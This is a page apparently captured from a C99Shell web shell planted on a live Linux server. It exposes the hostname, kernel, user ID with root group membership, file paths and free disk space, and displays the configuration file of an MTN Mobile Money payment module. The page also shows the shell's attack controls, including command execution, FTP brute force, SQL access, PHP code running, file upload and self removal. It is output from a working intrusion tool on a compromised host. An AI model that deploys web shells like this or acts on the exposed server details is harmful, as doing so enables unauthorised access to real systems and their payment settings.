!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/MtnMomo/Config/   drwxr-xr-x
Free 27.49 GB of 117.98 GB (23.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     config.php (4.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

return [
    
'name' => 'MtnMomo',

    
'alias' => 'mtnmomo',

    
'logo' => 'Modules/MtnMomo/Resources/assets/mtnmomo.png',

    
// MTN momo addon settings

    
'options' => [
        [
'label' => __('Settings'), 'type' => 'modal''url' => 'mtnmomo.edit'],
        [
'label' => __('MTN Momo Documentation'), 'target' => '_blank''url' => 'https://momodeveloper.mtn.com/']
    ],

    
/**
     * MTN momo data validation
     */
    
'validation' => [
        
'rules' => [
            
'userApiId' => 'required',
            
'userApiKey' => 'required',
            
'ocpApimSubscriptionKey' => 'required',
            
'sandbox' => 'required',
        ],
        
'attributes' => [
            
'userApiId' => __('User API Id'),
            
'userApiKey' => __('User API key'),
            
'ocpApimSubscriptionKey' => __('Subscription key'),
            
'sandbox' => __('Please specify sandbox enabled/disabled.')
        ]
    ],
    
'fields' => [
        
'userApiId' => [
            
'label' => __('User API Id'),
            
'type' => 'text',
            
'required' => true
        
],
        
'userApiKey' => [
            
'label' => __('User API Key'),
            
'type' => 'text',
            
'required' => true
        
],
        
'ocpApimSubscriptionKey' => [
            
'label' => __('Subscription key'),
            
'type' => 'text',
            
'required' => true
        
],
        
'instruction' => [
            
'label' => __('Instruction'),
            
'type' => 'textarea',
        ],
        
'sandbox' => [
            
'label' => __('Sandbox'),
            
'type' => 'select',
            
'required' => true,
            
'options' => [
                
'Enabled' => 1,
                
'Disabled' =>  0
            
]
        ],
        
'country' => [
            
'label' => __('Country'),
            
'type' => 'select',
            
'required' => true,
            
'options' => [
                
'Benin' => 'benin',
                
'Cameroon' => 'cameroon',
                
'Congo' => 'congo',
                
'Ghana' => 'ghana',
                
'Guinea' => 'guinea',
                
'Ivory Coast' => 'ivoryCoast',
                
'Liberia' => 'liberia',
                
'Rwanda' => 'rwanda',
                
'South Africa' => 'southAfrica',
                
'Swaziland' => 'swaziland',
                
'Uganda' => 'uganda',
                
'Zambia' => 'zambia',
            ]
        ],
        
'status' => [
            
'label' => __('Status'),
            
'type' => 'select',
            
'required' => true,
            
'options' => [
                
'Active' => 1,
                
'Inactive' =>  0
            
]
        ]
    ],
    
'store_route' => 'mtnmomo.store',

    
'sandbox' => [
        
'xTargetEnvironment' => 'sandbox',
        
'currency' => 'EUR'
    
],
    
'benin' => [
        
'xTargetEnvironment' => 'mtnbenin',
        
'currency' => 'XOF'
    
],
    
'cameroon' => [
        
'xTargetEnvironment' => 'mtncameroon',
        
'currency' => 'XAF'
    
],
    
'congo' => [
        
'xTargetEnvironment' => 'mtncongo',
        
'currency' => 'XAF'
    
],
    
'ghana' => [
        
'xTargetEnvironment' => 'mtnghana',
        
'currency' => 'GHS'
    
],
    
'guinea' => [
        
'xTargetEnvironment' => 'mtnguineac',
        
'currency' => 'GNF'
    
],
    
'ivoryCoast' => [
        
'xTargetEnvironment' => 'mtnivorycoast',
        
'currency' => 'XOF'
    
],
    
'liberia' => [
        
'xTargetEnvironment' => 'mtnliberia',
        
'currency' => 'LRD'
    
],
    
'rwanda' => [
        
'xTargetEnvironment' => 'mtnrwanda',
        
'currency' => 'RWF'
    
],
    
'southAfrica' => [
        
'xTargetEnvironment' => 'mtnsouthafrica',
        
'currency' => 'ZAR'
    
],
    
'swaziland' => [
        
'xTargetEnvironment' => 'mtnswaziland',
        
'currency' => 'SZL'
    
],
    
'uganda' => [
        
'xTargetEnvironment' => 'mtnuganda',
        
'currency' => 'UGX'
    
],
    
'zambia' => [
        
'xTargetEnvironment' => 'mtnzambia',
        
'currency' => 'ZMW'
    
],

];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0054 ]--